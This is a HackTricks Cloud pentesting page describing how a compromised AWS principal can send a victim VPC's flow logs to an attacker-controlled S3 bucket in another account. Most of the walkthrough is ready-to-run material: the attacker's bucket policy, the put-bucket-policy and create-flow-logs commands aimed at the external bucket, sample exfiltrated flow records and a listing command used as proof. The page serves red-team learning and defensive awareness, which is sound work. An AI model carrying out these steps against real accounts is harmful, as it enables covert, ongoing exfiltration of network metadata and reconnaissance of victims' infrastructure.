HackTricks CloudAWS - VPC Flow Logs Cross-Account Exfiltration to S3
Reading time: 4 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Summary
Abuse ec2:CreateFlowLogs to export VPC, subnet, or ENI flow logs directly to an attacker-controlled S3 bucket. Once the delivery role is configured to write to the external bucket, every connection seen on the monitored resource is streamed out of the victim account.
Requirements
- Victim principal:
ec2:CreateFlowLogs,ec2:DescribeFlowLogs, andiam:PassRole(if a delivery role is required/created). - Attacker bucket: S3 policy that trusts
delivery.logs.amazonaws.comwiths3:PutObjectandbucket-owner-full-control. - Optional:
logs:DescribeLogGroupsif exporting to CloudWatch instead of S3 (not needed here).
Attack Walkthrough
- Attacker prepares an S3 bucket policy (in attacker account) that allows the VPC Flow Logs delivery service to write objects. Replace placeholders before applying:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowVPCFlowLogsDelivery",
"Effect": "Allow",
"Principal": { "Service": "delivery.logs.amazonaws.com" },
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::<attacker-bucket>/flowlogs/*",
"Condition": {
"StringEquals": { "s3:x-amz-acl": "bucket-owner-full-control" }
}
}
]
}
Apply from the attacker account:
aws s3api put-bucket-policy \
--bucket <attacker-bucket> \
--policy file://flowlogs-policy.json
- Victim (compromised principal) creates the flow logs targeting the attacker bucket:
REGION=us-east-1
VPC_ID=<vpc-xxxxxxxx>
ROLE_ARN=<delivery-role-with-logs-permissions> # Must allow delivery.logs.amazonaws.com to assume it
aws ec2 create-flow-logs \
--resource-type VPC \
--resource-ids "$VPC_ID" \
--traffic-type ALL \
--log-destination-type s3 \
--log-destination arn:aws:s3:::<attacker-bucket>/flowlogs/ \
--deliver-logs-permission-arn "$ROLE_ARN" \
--region "$REGION"
Within minutes, flow log files appear in the attacker bucket containing connections for all ENIs in the monitored VPC/subnet.
Evidence
Sample flow log records written to the attacker bucket:
version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
2 947247140022 eni-074cdc68182fb7e4d 52.217.123.250 10.77.1.240 443 48674 6 2359 3375867 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 52.217.123.250 48674 443 6 169 7612 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 54.231.199.186 10.77.1.240 443 59604 6 34 33539 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 54.231.199.186 59604 443 6 18 1726 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 16.15.204.15 10.77.1.240 443 57868 6 162 1219352 1759874460 1759874487 ACCEPT OK
Bucket listing proof:
aws s3 ls s3://<attacker-bucket>/flowlogs/ --recursive --human-readable --summarize
Impact
- Continuous network metadata exfiltration (source/destination IPs, ports, protocols) for the monitored VPC/subnet/ENI.
- Enables traffic analysis, identification of sensitive services, and potential hunting for security group misconfigurations from outside the victim account.
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.